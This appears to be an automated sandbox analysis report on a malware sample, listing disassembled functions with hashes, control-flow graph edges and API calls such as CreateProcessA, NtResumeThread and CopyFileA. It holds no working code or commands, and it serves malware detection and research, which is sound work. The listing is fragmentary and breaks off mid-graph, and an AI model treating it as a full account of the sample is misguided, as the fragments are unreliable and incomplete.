                                              • Opcode Fuzzy Hash: a16b2615ca5fb426859cf57ac48f06f9ebe436ee2e7dbd6f0f25c30d4e40e5ff
                                              • Instruction Fuzzy Hash: F631BAB5D012189FDB10CFA9D980AEEFBF1BF49310F24942AE915B7200C775A905CF94
                                              Function 056F9CE8 Relevance: 1.6, APIs: 1, Instructions: 82nativethreadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtResumeThread.NTDLL(?,?), ref: 056F9D76
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399439396.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_56f0000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID: ResumeThread
                                              • String ID:
                                              • API String ID: 947044025-0
                                              • Opcode ID: d055f6e63c33a52e5c8157878b0664a44e7c986ff18fee169b175423b674e111
                                              • Instruction ID: c9862bf11b34648196f4ec95a9c1aa684f2151af1269df3b9fed59845f7454ec
                                              • Opcode Fuzzy Hash: d055f6e63c33a52e5c8157878b0664a44e7c986ff18fee169b175423b674e111
                                              • Instruction Fuzzy Hash: A43199B5D012589FDF10CFAAD984AAEFBF1BB49310F20942AE915B7200C775A905CF94
                                              Function 056F3988 Relevance: 1.4, Strings: 1, Instructions: 170COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399439396.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_56f0000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: h
                                              • API String ID: 0-2439710439
                                              • Opcode ID: 8474ac7226c7fc09f9bc0322a3dc3206ae7fc7564535c28bef88ca9aa9d77664
                                              • Instruction ID: 19caf9e9666dc0816b4b1680bfd2826fb14bd137188c86fa543be095f79e265c
                                              • Opcode Fuzzy Hash: 8474ac7226c7fc09f9bc0322a3dc3206ae7fc7564535c28bef88ca9aa9d77664
                                              • Instruction Fuzzy Hash: F3710571E006288FDB14DF6ADC50BDAB7B2FF89300F1086AAD509A7354DB746A85CF50
                                              Function 00F8A660 Relevance: 1.0, Instructions: 956COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2378372832.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_f80000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5be6ffab2593a737b6b926d8e1338f68e69ac1d019a772c5d557b92250add5f1
                                              • Instruction ID: ce0472d32d289ec38c45d29338222105487e61e143cc39b15b00fd073f103782
                                              • Opcode Fuzzy Hash: 5be6ffab2593a737b6b926d8e1338f68e69ac1d019a772c5d557b92250add5f1
                                              • Instruction Fuzzy Hash: 89A2B275A00628CFDB65DF69C984AD9BBB2FF89300F1581E9D509AB321DB319E81DF40
                                              Function 051A89F8 Relevance: .8, Instructions: 802COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2396175651.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_51a0000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c167e9cbd60fc96513df468a7d04758359f186d8e2949573d662026068a2c2f5
                                              • Instruction ID: 3ed5ac090ca2bebabd1e2fb768c11b5414f07df1e2ba8d4d41e8d974071d3394
                                              • Opcode Fuzzy Hash: c167e9cbd60fc96513df468a7d04758359f186d8e2949573d662026068a2c2f5
                                              • Instruction Fuzzy Hash: B2629AB5B007159FDB19CFA9C498A6EBBF2FF88300F14892AD556D7780DB34A941CB90
                                              Function 00F8E513 Relevance: .5, Instructions: 539COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2378372832.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_f80000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: dde39dbf11193773406771b7ac36a58cafd97646c94f024b2ae4814e22f1334c
                                              • Instruction ID: 28efbd6100b68503b3f7be10d881cc64d69cf9823438d6c1faf6b6b2cc9af11f
                                              • Opcode Fuzzy Hash: dde39dbf11193773406771b7ac36a58cafd97646c94f024b2ae4814e22f1334c
                                              • Instruction Fuzzy Hash: 6052B3B4A046288FCB64EF28DC84B9ABBB1FB89301F1081D9D50DA7355DB74AE81DF51
                                              Function 057187C0 Relevance: .5, Instructions: 451COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399489943.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_5710000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bddaeaa2f770ea92c84ce0a029ea162b1bba67df7477cbb2af47d2cdce374c16
                                              • Instruction ID: a3a98ecf9fea515c0e6397a013c658332e4ae8f6c033048170eddd9218821d57
                                              • Opcode Fuzzy Hash: bddaeaa2f770ea92c84ce0a029ea162b1bba67df7477cbb2af47d2cdce374c16
                                              • Instruction Fuzzy Hash: 3D120670A05228CFDB24DF6DD884BAEB7B2FB49300F1081A9D80AA7355DB749E85DF15
                                              Function 057187B0 Relevance: .4, Instructions: 443COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399489943.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_5710000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 586ba87a2a882e9e5c56ca515c48a9d4f363f340ca9d58d0d89efe2e6bd9a7fb
                                              • Instruction ID: 80f8139744e96890936ba9d9731035355e6b7875e467778628a988992e5aed20
                                              • Opcode Fuzzy Hash: 586ba87a2a882e9e5c56ca515c48a9d4f363f340ca9d58d0d89efe2e6bd9a7fb
                                              • Instruction Fuzzy Hash: 07120770E05228CFDB24DF69D884BAEB7B2FB49300F1081A9D80AA7355DB749E85DF15
                                              Function 00F82A25 Relevance: .4, Instructions: 388COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2378372832.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_f80000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5da76d468996f3bc9d8082879b4e085d82fb8a5afbc2b3b6820a80eca836a6f7
                                              • Instruction ID: c35994571e2cdcd377535faf431a11d10297a9231c387ae9b3f4288e2e6e4a6f
                                              • Opcode Fuzzy Hash: 5da76d468996f3bc9d8082879b4e085d82fb8a5afbc2b3b6820a80eca836a6f7
                                              • Instruction Fuzzy Hash: DDE10232E09209CFCB51EFA8C890BEDBBB1FF95300F15856AD406AB252D734B945EB51
                                              Function 0582ED48 Relevance: .3, Instructions: 276COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399639540.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_5810000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b7e0ba99cfb7dd40fc02edfb82c05b173f5b4b19b0d31d1fa8fe18c7c981f088
                                              • Instruction ID: f5a5a17512e16c6250f7c5870c9ede4dada1a2d1b305d4b54f73d5ed3f91c2ce
                                              • Opcode Fuzzy Hash: b7e0ba99cfb7dd40fc02edfb82c05b173f5b4b19b0d31d1fa8fe18c7c981f088
                                              • Instruction Fuzzy Hash: A2D1C074E01219CFDB54DFA9D994A9EBBB2FF88300F1081A9D409AB365DB31AD81CF50
                                              Function 051AE586 Relevance: .3, Instructions: 256COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2396175651.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_51a0000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 53557576225229a2594136bd02d77a1f0f4c5c1fad1e88383fe58a6aaa7e7e31
                                              • Instruction ID: 7564c8be547bfcf3464c9625e340cdf75fb0aed749961566be5ce292aafbeb39
                                              • Opcode Fuzzy Hash: 53557576225229a2594136bd02d77a1f0f4c5c1fad1e88383fe58a6aaa7e7e31
                                              • Instruction Fuzzy Hash: 26C13A78E05218CFDB25DFA9C984BAEBBF6FF89300F1182A9D409A7245DB745985CF01
                                              Function 04F9B6B8 Relevance: .2, Instructions: 248COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2395215825.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_4f90000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 60ba815c4e13ddbbd75bec2b23d2ca8bfa611026ccc5458f67fdd1033b33065d
                                              • Instruction ID: 3d549b03fa9bbe3612d598a9656dff251e037757b5171d951da318fdaf912012
                                              • Opcode Fuzzy Hash: 60ba815c4e13ddbbd75bec2b23d2ca8bfa611026ccc5458f67fdd1033b33065d
                                              • Instruction Fuzzy Hash: A5B1C374E05218CFEB14DFA9E984BADBBF6FB49304F1081A9D409A7255EB706D86CF01
                                              Function 04F9B6AA Relevance: .2, Instructions: 246COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2395215825.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_4f90000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d0a1c6af7a7c1b600abf550a9511fc6ecf71d3f7d3f126481b054197e8b998b4
                                              • Instruction ID: 3e7b70361eff30c01beee8b3f5d2e695df9226292c7cbdd3352eefc4eb720e9f
                                              • Opcode Fuzzy Hash: d0a1c6af7a7c1b600abf550a9511fc6ecf71d3f7d3f126481b054197e8b998b4
                                              • Instruction Fuzzy Hash: 64B1A274E05218CFEB54DFA9E984B9DBBF2FB49304F1081A9D409A7255EB70AD86CF01
                                              Function 056F7120 Relevance: .2, Instructions: 186COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399439396.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_56f0000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a8f2105cd9e273d316e458c074d79fdbbacdb2dcd8fb1aac43c1d73af1ee7d5f
                                              • Instruction ID: 3c731777090e5716a10d8048f41fa5316b36dbd0e0311d466955bd448b8b46d8
                                              • Opcode Fuzzy Hash: a8f2105cd9e273d316e458c074d79fdbbacdb2dcd8fb1aac43c1d73af1ee7d5f
                                              • Instruction Fuzzy Hash: 5971F874E01209DFDB08DFA9D950AAEBBF2FF89300F148029E509AB355DB34A946DB54
                                              Function 056F7130 Relevance: .2, Instructions: 181COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399439396.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_56f0000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 13362f795d7e67d05e1ab92bb72f0f19610bcd80f937569dfac41ba17dfcee4e
                                              • Instruction ID: 9e93c468d48a75c7f40a6e4eec3e2d7e5b4b842404a3375eff149f7d7e44b3f2
                                              • Opcode Fuzzy Hash: 13362f795d7e67d05e1ab92bb72f0f19610bcd80f937569dfac41ba17dfcee4e
                                              • Instruction Fuzzy Hash: B0710774E01209DFDB08DFA9D950AAEBBF6FF89300F148029E509AB355DB34A946CF54
                                              Function 00F85179 Relevance: 2.7, Strings: 1, Instructions: 1446COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 103 f85179-f8517a 104 f8517c-f851e4 103->104 105 f85107 103->105 110 f840a1-f840ac 104->110 106 f85109-f85113 105->106 107 f85115-f85120 105->107 106->107 107->110 113 f840ba-f840eb 110->113 114 f840ed-f84122 110->114 115 f84127-f8421c 110->115 113->110 114->110 144 f85569 115->144 145 f84222 115->145 144->144 146 f8422a-f84453 145->146 146->144 159 f84459-f8457c 146->159 159->144 166 f84582-f846bb 159->166 166->144 173 f846c1-f847fa 166->173 173->144 180 f84800-f85106 173->180 180->105
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2378372832.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_f80000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: jjjjjj
                                              • API String ID: 0-3900813449
                                              • Opcode ID: d0a3dd68cf90b6b3c39dd390ba38ab21239baf5b8d6df77a5afca0b2b55a70b6
                                              • Instruction ID: eccc227aa2d3b6127e2dda0fe9efc862dc9553b9ea259e54c52d14bbec860416
                                              • Opcode Fuzzy Hash: d0a3dd68cf90b6b3c39dd390ba38ab21239baf5b8d6df77a5afca0b2b55a70b6
                                              • Instruction Fuzzy Hash: D4E2177A250510EFDB4A9F98D988D55BBB2FF4D32471A81D8F2099B232C732D861EF50
                                              Function 00F85239 Relevance: 2.7, Strings: 1, Instructions: 1443COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 236 f85239-f8523a 237 f8523c-f85247 236->237 238 f851c7-f851e4 236->238 239 f85569 237->239 240 f8524d-f85277 237->240 244 f840a1-f840ac 238->244 239->239 240->244 247 f840ba-f840eb 244->247 248 f840ed-f84122 244->248 249 f84127-f8421c 244->249 247->244 248->244 249->239 273 f84222 249->273 274 f8422a-f84453 273->274 274->239 287 f84459-f8457c 274->287 287->239 294 f84582-f846bb 287->294 294->239 301 f846c1-f847fa 294->301 301->239 308 f84800-f85107 301->308 365 f85109-f85113 308->365 366 f85115-f85120 308->366 365->366 366->244
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2378372832.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_f80000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: jjjjjj
                                              • API String ID: 0-3900813449
                                              • Opcode ID: 930e8a97997a3b6c0a9882a205557d5629aab26d38d3bc4cf51b57a2a335e6f4
                                              • Instruction ID: 732eb62e6d451d997e7c2b8d2f983c5b88fc639b7e868eae306768194ab5f462
                                              • Opcode Fuzzy Hash: 930e8a97997a3b6c0a9882a205557d5629aab26d38d3bc4cf51b57a2a335e6f4
                                              • Instruction Fuzzy Hash: 92E2077A250510EFDB4A9F98D948D55BBB2FF4D32471A81D8F2099B232C732E861EF50
                                              Function 00F85132 Relevance: 2.7, Strings: 1, Instructions: 1417COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 368 f85132-f8513e
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2378372832.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_f80000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: jjjjjj
                                              • API String ID: 0-3900813449
                                              • Opcode ID: f09c72a3dd55c7d850e8b9038582f4265d8a683fb2d0ede268bfa07ba621d6dd
                                              • Instruction ID: aa287ba68324733f7b4890f879f1498d8623a6ea662ef5b4ee928285373721fb
                                              • Opcode Fuzzy Hash: f09c72a3dd55c7d850e8b9038582f4265d8a683fb2d0ede268bfa07ba621d6dd
                                              • Instruction Fuzzy Hash: BCD2077A250510EFDB4A9F98DA48D55BBB2FF4D32471A81D8F6099B232C732D861EF40
                                              Function 056F7F6E Relevance: 1.8, APIs: 1, Instructions: 264processCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1147 56f7f6e-56f800a 1149 56f800c-56f8023 1147->1149 1150 56f8053-56f807b 1147->1150 1149->1150 1155 56f8025-56f802a 1149->1155 1153 56f807d-56f8091 1150->1153 1154 56f80c1-56f8117 1150->1154 1153->1154 1164 56f8093-56f8098 1153->1164 1162 56f815d-56f81f2 CreateProcessA 1154->1162 1163 56f8119-56f812d 1154->1163 1156 56f804d-56f8050 1155->1156 1157 56f802c-56f8036 1155->1157 1156->1150 1159 56f803a-56f8049 1157->1159 1160 56f8038 1157->1160 1159->1159 1165 56f804b 1159->1165 1160->1159 1179 56f81fb-56f8271 1162->1179 1180 56f81f4-56f81fa 1162->1180 1163->1162 1172 56f812f-56f8134 1163->1172 1166 56f80bb-56f80be 1164->1166 1167 56f809a-56f80a4 1164->1167 1165->1156 1166->1154 1169 56f80a8-56f80b7 1167->1169 1170 56f80a6 1167->1170 1169->1169 1173 56f80b9 1169->1173 1170->1169 1174 56f8157-56f815a 1172->1174 1175 56f8136-56f8140 1172->1175 1173->1166 1174->1162 1177 56f8144-56f8153 1175->1177 1178 56f8142 1175->1178 1177->1177 1181 56f8155 1177->1181 1178->1177 1186 56f8273-56f8277 1179->1186 1187 56f8281-56f8285 1179->1187 1180->1179 1181->1174 1186->1187 1188 56f8279 1186->1188 1189 56f8287-56f828b 1187->1189 1190 56f8295-56f8299 1187->1190 1188->1187 1189->1190 1191 56f828d 1189->1191 1192 56f829b-56f829f 1190->1192 1193 56f82a9 1190->1193 1191->1190 1192->1193 1194 56f82a1 1192->1194 1195 56f82aa 1193->1195 1194->1193 1195->1195
                                              APIs
                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 056F81DF
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399439396.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_56f0000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0
                                              • Opcode ID: a7c20d9bd5df060eb5115588b821ed73c979e5f7e4ec4bc3598d44af91a8a1a4
                                              • Instruction ID: cd51f1b776b5999a5f9dd43518b02e3788b58ac5c0c47a917dbd2661bd230cd8
                                              • Opcode Fuzzy Hash: a7c20d9bd5df060eb5115588b821ed73c979e5f7e4ec4bc3598d44af91a8a1a4
                                              • Instruction Fuzzy Hash: 21A11270D04219CFDF20CFA9C885BEEBBB1BF4A304F1491A9E859A7240DB749985CF95
                                              Function 056F7F78 Relevance: 1.8, APIs: 1, Instructions: 261processCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1196 56f7f78-56f800a 1198 56f800c-56f8023 1196->1198 1199 56f8053-56f807b 1196->1199 1198->1199 1204 56f8025-56f802a 1198->1204 1202 56f807d-56f8091 1199->1202 1203 56f80c1-56f8117 1199->1203 1202->1203 1213 56f8093-56f8098 1202->1213 1211 56f815d-56f81f2 CreateProcessA 1203->1211 1212 56f8119-56f812d 1203->1212 1205 56f804d-56f8050 1204->1205 1206 56f802c-56f8036 1204->1206 1205->1199 1208 56f803a-56f8049 1206->1208 1209 56f8038 1206->1209 1208->1208 1214 56f804b 1208->1214 1209->1208 1228 56f81fb-56f8271 1211->1228 1229 56f81f4-56f81fa 1211->1229 1212->1211 1221 56f812f-56f8134 1212->1221 1215 56f80bb-56f80be 1213->1215 1216 56f809a-56f80a4 1213->1216 1214->1205 1215->1203 1218 56f80a8-56f80b7 1216->1218 1219 56f80a6 1216->1219 1218->1218 1222 56f80b9 1218->1222 1219->1218 1223 56f8157-56f815a 1221->1223 1224 56f8136-56f8140 1221->1224 1222->1215 1223->1211 1226 56f8144-56f8153 1224->1226 1227 56f8142 1224->1227 1226->1226 1230 56f8155 1226->1230 1227->1226 1235 56f8273-56f8277 1228->1235 1236 56f8281-56f8285 1228->1236 1229->1228 1230->1223 1235->1236 1237 56f8279 1235->1237 1238 56f8287-56f828b 1236->1238 1239 56f8295-56f8299 1236->1239 1237->1236 1238->1239 1240 56f828d 1238->1240 1241 56f829b-56f829f 1239->1241 1242 56f82a9 1239->1242 1240->1239 1241->1242 1243 56f82a1 1241->1243 1244 56f82aa 1242->1244 1243->1242 1244->1244
                                              APIs
                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 056F81DF
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399439396.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_56f0000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0
                                              • Opcode ID: 2c7a7ba35b3b216008fb42cb9e55d7ab155fe541c38febd7e4cecae6e0ab6564
                                              • Instruction ID: a130e34396b0198881838138cdf05cccd907cd7959071ed690e6bd8b560e19a2
                                              • Opcode Fuzzy Hash: 2c7a7ba35b3b216008fb42cb9e55d7ab155fe541c38febd7e4cecae6e0ab6564
                                              • Instruction Fuzzy Hash: 94A11170D04219CFDF20CFA9C885BEEBBB1BF4A300F1091A9E859A7240DB749985CF95
                                              Function 056EC584 Relevance: 1.7, APIs: 1, Instructions: 172fileCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1553 56ec584-56ec5fb 1555 56ec5fd-56ec611 1553->1555 1556 56ec641-56ec666 1553->1556 1555->1556 1559 56ec613-56ec618 1555->1559 1560 56ec6ac-56ec71b CopyFileA 1556->1560 1561 56ec668-56ec67c 1556->1561 1562 56ec61a-56ec624 1559->1562 1563 56ec63b-56ec63e 1559->1563 1575 56ec71d-56ec723 1560->1575 1576 56ec724-56ec786 1560->1576 1561->1560 1568 56ec67e-56ec683 1561->1568 1564 56ec628-56ec637 1562->1564 1565 56ec626 1562->1565 1563->1556 1564->1564 1569 56ec639 1564->1569 1565->1564 1570 56ec6a6-56ec6a9 1568->1570 1571 56ec685-56ec68f 1568->1571 1569->1563 1570->1560 1573 56ec693-56ec6a2 1571->1573 1574 56ec691 1571->1574 1573->1573 1577 56ec6a4 1573->1577 1574->1573 1575->1576 1582 56ec788-56ec78c 1576->1582 1583 56ec796-56ec79a 1576->1583 1577->1570 1582->1583 1584 56ec78e 1582->1584 1585 56ec79c-56ec7a0 1583->1585 1586 56ec7aa 1583->1586 1584->1583 1585->1586 1587 56ec7a2 1585->1587 1588 56ec7ab 1586->1588 1587->1586 1588->1588
                                              APIs
                                              • CopyFileA.KERNEL32(?,?,?), ref: 056EC70B
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399309198.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_56e0000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID: CopyFile
                                              • String ID:
                                              • API String ID: 1304948518-0
                                              • Opcode ID: e06ea92a479647c81e6c945c1501572af1f3c003ebc1a717658c8b115778fc9a
                                              • Instruction ID: 059b295b7514465f34593fbdaf5b010d4f8222aa921e797ea1215b0c961f77c5
                                              • Opcode Fuzzy Hash: e06ea92a479647c81e6c945c1501572af1f3c003ebc1a717658c8b115778fc9a
                                              • Instruction Fuzzy Hash: E36112B0D02318DFEB14CFA9C9857EEBBF1BB49310F249129E815A7280DB788985CF45
                                              Function 056EC590 Relevance: 1.7, APIs: 1, Instructions: 169fileCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1589 56ec590-56ec5fb 1591 56ec5fd-56ec611 1589->1591 1592 56ec641-56ec666 1589->1592 1591->1592 1595 56ec613-56ec618 1591->1595 1596 56ec6ac-56ec71b CopyFileA 1592->1596 1597 56ec668-56ec67c 1592->1597 1598 56ec61a-56ec624 1595->1598 1599 56ec63b-56ec63e 1595->1599 1611 56ec71d-56ec723 1596->1611 1612 56ec724-56ec786 1596->1612 1597->1596 1604 56ec67e-56ec683 1597->1604 1600 56ec628-56ec637 1598->1600 1601 56ec626 1598->1601 1599->1592 1600->1600 1605 56ec639 1600->1605 1601->1600 1606 56ec6a6-56ec6a9 1604->1606 1607 56ec685-56ec68f 1604->1607 1605->1599 1606->1596 1609 56ec693-56ec6a2 1607->1609 1610 56ec691 1607->1610 1609->1609 1613 56ec6a4 1609->1613 1610->1609 1611->1612 1618 56ec788-56ec78c 1612->1618 1619 56ec796-56ec79a 1612->1619 1613->1606 1618->1619 1620 56ec78e 1618->1620 1621 56ec79c-56ec7a0 1619->1621 1622 56ec7aa 1619->1622 1620->1619 1621->1622 1623 56ec7a2 1621->1623 1624 56ec7ab 1622->1624 1623->1622 1624->1624
                                              APIs
                                              • CopyFileA.KERNEL32(?,?,?), ref: 056EC70B
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399309198.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_56e0000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID: CopyFile
                                              • String ID:
                                              • API String ID: 1304948518-0
                                              • Opcode ID: 9f6a58457185f1a8da90ee6f311a4fedc2a8f574b05a93eaa92a0cb2fd4f70ce
                                              • Instruction ID: 5635ffdfbc6a199adb07456f3dcfe9c47bbca9d8751602ff8a5d64f8d87a4c1e
                                              • Opcode Fuzzy Hash: 9f6a58457185f1a8da90ee6f311a4fedc2a8f574b05a93eaa92a0cb2fd4f70ce
                                              • Instruction Fuzzy Hash: C7610270D02319DFEB14CFA9C9857EEBBF1BB49310F249129E815A7280DB789985CF85
                                              Function 00F81011 Relevance: 1.6, Strings: 1, Instructions: 373COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1625 f81011-f81071 1629 f8107d-f81091 1625->1629 1630 f81073-f81077 1625->1630 1632 f8109f-f810aa 1629->1632 1630->1629 1634 f81093-f81096 1632->1634 1634->1632 1635 f81098 1634->1635 1635->1632 1636 f8117b-f81192 1635->1636 1637 f8145b-f81466 1635->1637 1638 f810dc-f810ef 1635->1638 1639 f8143e-f81459 call f80198 1635->1639 1640 f810f1-f8110c 1635->1640 1641 f81314-f8132d 1635->1641 1642 f810d5-f810da 1635->1642 1643 f81197 1635->1643 1644 f81468-f8146b 1635->1644 1645 f810ac-f810c1 1635->1645 1646 f8110e-f81110 1635->1646 1647 f812ee-f812f5 1635->1647 1648 f81120-f81123 1635->1648 1649 f81162-f81176 1635->1649 1650 f81302-f81312 1635->1650 1651 f810c3-f810d3 1635->1651 1636->1634 1652 f81425-f81428 1637->1652 1638->1634 1639->1652 1640->1634 1667 f8132f-f81331 1641->1667 1668 f81333 1641->1668 1642->1634 1653 f81198-f8119b 1643->1653 1731 f8146e call f817d8 1644->1731 1732 f8146e call f817c8 1644->1732 1645->1634 1646->1653 1654 f81116-f8111b 1646->1654 1663 f812fb-f81300 1647->1663 1655 f81129-f8113c 1648->1655 1656 f814cd-f81539 1648->1656 1649->1634 1676 f812c7-f812ca 1650->1676 1651->1634 1670 f8142a 1652->1670 1671 f81431-f8143c 1652->1671 1653->1648 1666 f8119d-f811ec call f80188 1653->1666 1654->1634 1655->1656 1661 f81142-f8114e 1655->1661 1684 f8153b 1656->1684 1685 f8157e 1656->1685 1660 f81474-f8147f 1660->1652 1661->1656 1675 f81154-f8115d 1661->1675 1663->1676 1709 f811f8-f81267 1666->1709 1710 f811ee-f811f2 1666->1710 1678 f81338-f8133a 1667->1678 1668->1678 1670->1637 1670->1639 1670->1644 1670->1671 1679 f814b3-f814cc 1670->1679 1671->1652 1675->1634 1681 f812bc 1676->1681 1682 f812cc 1676->1682 1687 f8133c 1678->1687 1688 f81345 1678->1688 1681->1676 1682->1637 1682->1639 1682->1641 1682->1644 1682->1647 